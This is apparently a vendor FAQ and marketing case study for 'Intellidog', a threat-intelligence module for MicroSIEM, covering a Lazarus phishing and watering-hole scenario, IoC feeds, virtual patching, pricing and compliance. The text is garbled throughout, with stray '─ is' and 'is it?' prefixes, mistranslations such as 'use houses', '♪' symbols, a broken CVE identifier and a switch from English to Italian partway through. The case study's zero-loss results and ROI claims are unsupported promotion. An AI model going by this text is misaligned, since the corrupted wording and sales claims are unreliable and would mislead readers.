**Week 1 - Reconnaissance (Detected by Intellidog)**

MISP alert: New Lazarus campaign targeting crypto exchanges

Intellidog action:
─ is Update IoC database with Lazarus indicators
─ is Proactive Hunt: Search logs for any past Lazarus activity
─ Result: Clean (no prior compromise)

**Week 2 - Spear-Phishing Attempt**

Email received: CFO receives "urgent compliance notice"
─ is Sender: compliance@crypto-regulatory-authority.com (spoofed)
─ is Attachment: PDF (actually .exe with PDF icon)
─ Traditional email security: ❌ Passed (sophisticated phishing)

Intellidog detection:
is it? ✅ Domain crypto-regulatory-authority.com: Newly registered (2 days ago)
is it? ✅ Domain reputation: 0/100 (no legitimate history)
is it? ✅ Attachment hash: Match Lazarus malware family (MISP)
─ Action: Email quarantined, CFO alert (security awareness reminder)

**Week 3 - Watering Hole Attack Detected**

Threat intel: Lazarus compromised popular crypto news site

Intellidog action:
is Block crypto-news-site. com at DNS level (temporary)
─ is Notify employees: "Site compromised, use alternative news sources"
─ is Monitor: Check if any employee visited before block (forensic analysis)
─ Result: 0 infections (proactive blocking quoteed exposure)

**Result:**

Attack results:
─ is Lazarus attempts: 3 (reconnaissance, phishing, watering hole)
Successful compromises: 0 (all blocked by Intellidog)
"It’s Potential loss: €50M (wallet theft if compromised)
Actual loss: €0
─ Intellidog ROI: 9,090x (€5.5k/year quoted €50M loss)

Business impact:
─ is Customer confidence: Maintained (no breach disclosure)
─ is Regulatory compliance: Perfect record (no incident reporting)
─ is Insurance premium: Reduced 20% (strong security posture)
─ Competitive advantage: Market Difference (security-first exchange)

FAQ – Intellidog

General

Q: Is Intellidog a separate tool or MicroSIEM module?
A: MicroSIEM Premium Module, not standalone tool. It is activated by purchasing MicroSIEM + Intellidog upgrades.

Q: Can I only buy Intellidog without MicroSIEM?
A: No, Intellidog requires MicroSIEM Active Base. It is complementary extension that adds intelligence to existing monitoring.

Q: How much is it?
A: €2.500/year (in addition to MicroSIEM Base €3,000).
Bundle: MicroSIEM + Intellidog = €5.500/year (no discount, cumulative prices).

Q: Do you need Sentinel Core to use Intellidog?
A: Not mandatory but recommended:

• ✅ Works without: Threat intel, generic exploit detection, virtual patching
• ⚠️ Limited: Without Sentinel Core cannot correlate specific CVE vulnerabilities with active exploits
• 💡 Best practice: MicroSIEM + Intellidog + Sentinel Core = maximum value

---

Threat Intelligence

Q: What feeds are included in the basic license?
A: Free Feeds included:

• MISP (community feeds)
• AlienVault OTX
• AbuseIPDB
• Talos Intelligence (Cisco)

Optional premium feed (separate cost):

• Shodan API ($59/month) – recommended
• VirusTotal API (from $500/year)
• Recorded Future (by €30k/year – enterprise only)

Q: Is Shodan really necessary?
A: Depends on use houses:

Shodan useful for:

• Asset exposed Internet (web server, API)
• Cloud infrastructure (AWS, Azure, GCP)
• Organizations with shadow IT risk
• Compliance requiring attack surface management

Shodan less critical for:

• Fully internal infrastructure (no Internet exposure)
• Organizations with rigorous asset inventory
• Limited budget (works without, reduced coverage ~70% vs ~95%

Q: Are my data shared with threat intel provider?
A: NO, zero data sharing:

• Intellidog download IoC from external feeds
• Intellidog not upload your data (IP, vulnerability, log)
• One-way communication: pull only

Opt-in volunteer: You can contribute anonymous IoC to MISP community (default: disabled).

Q: How up-to-date are the IoCs?
A: Update:

• MISP: Real-time (webhook) + sync every 4 hours
• AlienVault OTX: Every 1 hour
• AbuseIPDB: Real-time queries (API call when necessary)
• Shodan: Daily updates

Zero-day response: For CVE critical, instant manual sync available (command intellidog-sync --force-update).

---

Exploit Detection

Q: How many false positives generate exploit detection?
A: False positive rates (after initial tuning):

• Low (<30%): ~30% false positive (intended – catch all suspicious)
• Medium (30-70%): ~10% positive
• High (70-90%): ~2% positive
• Confirmed (90%+): <0.5% false positive

Tuning period: 2 weeks monitoring with feedback → false positive <5% overall.

Q: Can Intellidog detect exploit ever seen (zero-day)?
A: Partially:

• ✅ Behavioral detection: Syscall anomaly, process tree anomaly → detection zero-day
• ⚠️ Signature-based: IoC matching requires known signatures → miss zero-day until IoC published
• 💡 Hybrid approach: Combine both → best detection rate

Best practice: Defense-in-depth – Intellidog + EDR (CrowdStrike, SentinelOne) for full coverage.

Q: How does it distinguish between legitimate scanner vulnerability and attack?
A: Context-aware detection:

Vulnerability scanner (Nessus, OpenVAS):

• User-agent: Nessus scanner, OpenVAS
• Source IP: Internal network / known IP scanner
• Pattern: Sequential port scan (ordered)
• Timing: Scheduled (same time weekly)

Attacker:

• User-agent: Custom/spoofed
• Source IP: External / Tor exit node
• Pattern: Random port scan, targeting specific exploits
• Timing: Random, persistent

Configuration:

Whitelist legitimate scanners

whitelist:

• ip: 192.168.1.100
  description: "Nessus scanner"
  alert: false # Don’t alert on this IP

**Q: Intellidog monitora anche applicazioni custom (non solo vulnerabilità note)?**  
A: **Sì, behavioral analysis**:
- ✅ Process monitoring: Applicazione spawna shell = anomalo
- ✅ Network monitoring: Applicazione contatta IP non-whitelisted
- ✅ File monitoring: Applicazione crea file in location sospetta

**Limitation**: Senza CVE context (app custom non ha CVE), detection è behavioral-only (no IoC matching).

---

### **Virtual Patching**

**Q: Virtual patch è sicuro come patch vera?**  
A: **No, è mitigation temporanea**:

| Aspetto | Patch Ufficiale | Virtual Patch |
|---------|----------------|---------------|
| **Elimina vuln** | ✅ Sì | ❌ No (solo blocca exploit) |
| **Permanente** | ✅ Sì | ⚠️ Temporaneo |
| **Bypass risk** | ❌ No | ⚠️ Possibile (exploit variant) |
| **False positive** | ❌ No | ⚠️ Possibile (~1-2%) |
| **Deployment time** | ⚠️ Lento (ore/giorni) | ✅ Immediato (minuti) |

**Best practice**: Virtual patch come **bridge** mentre si attende/testa patch ufficiale.

**Q: Quanto tempo virtual patch rimane attivo?**  
A: **Fino a rimozione manuale** o automatic decommissioning:
- Manual removal: Quando patch ufficiale applicata
- Auto-decommissioning: Intellidog detect patch applicata (re-scan) → suggerisce rimozione virtual patch

**Lifecycle tipico**: 1-4 settimane (emergency mitigation → official patch → cleanup).

**Q: Virtual patch può bloccare traffico legittimo?**  
A: **Sì, risk mitigato con testing**:

**Testing mode** (obbligatorio):

Phase 1 (24-48h): ♪
─ is Virtual patch rules log but don’t block
─ Monitor false positive rate
─ Tune rules if necessary

Phase 2:
Activate blocking after successful testing
─ Continuous monitoring false positives

If legitimate traffic blocked

intellidog-vpatch –whitelist-ip 192.168.1.50 –vpatch-id CVE-2024- 12

Or

intellidog-vpatch –disable CVE-2024-1234 # Temporarily disable while suspected

**Q: Posso creare virtual patch custom (non-CVE)?**  
A: **Sì, custom rule builder**:

**UI Example**:

Create Virtual Patch:
─ is Name: "Block SQL Injection in /api/search"
─ is Target: web-prod-01
─ is Rule Type: ModSecurity WAF
─ is Pattern: SQL injection keywords (UNION, SELECT, DROP, etc.)
─ is Action: Block + Log
─ Testing: 48 hours alert-only

Result: Custom protection for proprietary application

---

### **Integrazione**

**Q: Intellidog comunica con Firedog?**  
A: **Sì, integration nativa** (con Integration Pack):
- Intellidog analizza PCAP da Firedog (exploit detection)
- Intellidog comanda Firedog per virtual patching (auto-block)
- Alert correlati (threat intel + firewall events)

**Q: Intellidog funziona con SIEM esterni (Splunk, ELK)?**  
A: **Sì, export capabilities**:
- Syslog forwarding (eventi Intellidog → SIEM)
- JSON export (IoC, detection results)
- API webhook (real-time event streaming)

**Use case**: Intellidog fa detection → invia event a Splunk → Splunk correla con altre security tools.

**Q: Posso integrare threat intel feed custom (interni)?**  
A: **Sì, import custom feeds**:

**Supported formats**:
- STIX 2.0/2.1 (Structured Threat Information Expression)
- CSV (IP, domain, hash, description)
- JSON (custom schema)

**Import methods**:
- Manual upload (UI)
- API REST (automation)
- Scheduled pull (Intellidog scarica da URL)

---

### **Performance & Scaling**

**Q: Intellidog rallenta MicroSIEM?**  
A: **Overhead minimo** (~10-15%):
- CPU: +10-15% durante IoC sync e correlation analysis
- RAM: +200-300MB per cache IoC (100k indicators)
- Disk: +50MB database threat intel locale
- Network: ~100MB/giorno sync IoC

**Optimization**: Analysis engine asincrono (non blocca monitoring normale).

**Q: Quanti IoC può gestire?**  
A: **Default capacity**:
- 100k IoC attivi in cache (performance optimal)
- 1M IoC storico in database (query più lente ma feasible)

**Enterprise deployment**: Database dedicato per IoC (PostgreSQL cluster) → scala a 10M+ IoC.

**Q: Intellidog funziona in ambienti air-gapped?**  
A: **Sì, con limitazioni**:

**Offline mode**:
- ✅ Behavioral analysis: Funziona (syscall, network anomaly detection)
- ❌ IoC matching: Limited (solo IoC cached, no real-time updates)
- ⚠️ Virtual patching: Funziona (rules generate locally)

**Sync workflow air-gapped**:

1. External system (with Internet) download IoC
2. Export IoC to USB drive (encrypted)
3. Import IoC in Intellidog air-gapped instance
4. Schedule: ♪

Compliance & Reporting

Q: Does Intellidog help with NIS2 compliance?
A: Yes, specifically.:

• Art. 21(2)(e): Threat intelligence → Intellidog multi-source feeds ✅
• Art. 21(2)(a): Risk analysis → Exploit detection + risk scoring ✅
• Art. 21(2)(f): Incident handling → Virtual patching + timeline reconstruction ✅

Q: Intellidog reports are audit-ready?
A: Yes:

• Timestamp NTP-synced (accurate events)
• Evidence trail (IoC sources, confidence scoring, correlation date)
• Export PDF/JSON to auditor
• Immutability (audit log append-only)

Auditor may check:

• "What threat intel source identified this threat? "
• "When was detection exploit? "
• "What remediation actions have been taken? "

---

Licensing & Support

Q: If I already have MicroSIEM, how do I add Intellidog?
A: Upgrade process:

1. Contact sales: upgrade@dognet.tech
2. License key updated ( difference €2.500/year)
3. Install module: microsiem-addon install intellidog
4. Configuration wizard: Threat intel API keys, alert settings
5. Testing: 24h trial period (verify works properly)

Downtime: Zero (hot installation, no reboot).

Use houses: Troubleshooting false positives, maintenance.

Q: Support includes threat intel feed setup?
A: Standard support (including):

• Free setup feed documentation guide (MISP, OTX, AbuseIPDB)
• Troubleshooting connection issues

Premium support (+€2000/year):

• Hands-on setup feed premium (Shodan, VirusTotal)
• Custom feed integration (if you have proprietary feed)
• Tuning detection rules (reducing false positives for your environment)

Q: Training available?
A: Workshop dedicated (optional, €1.500):

• Day 1: Threat intelligences, Intellidog features
• Day 2: Exploit detection tuning, virtual patching best practices, incident workflow

Material: Slides, lab environment, certification

---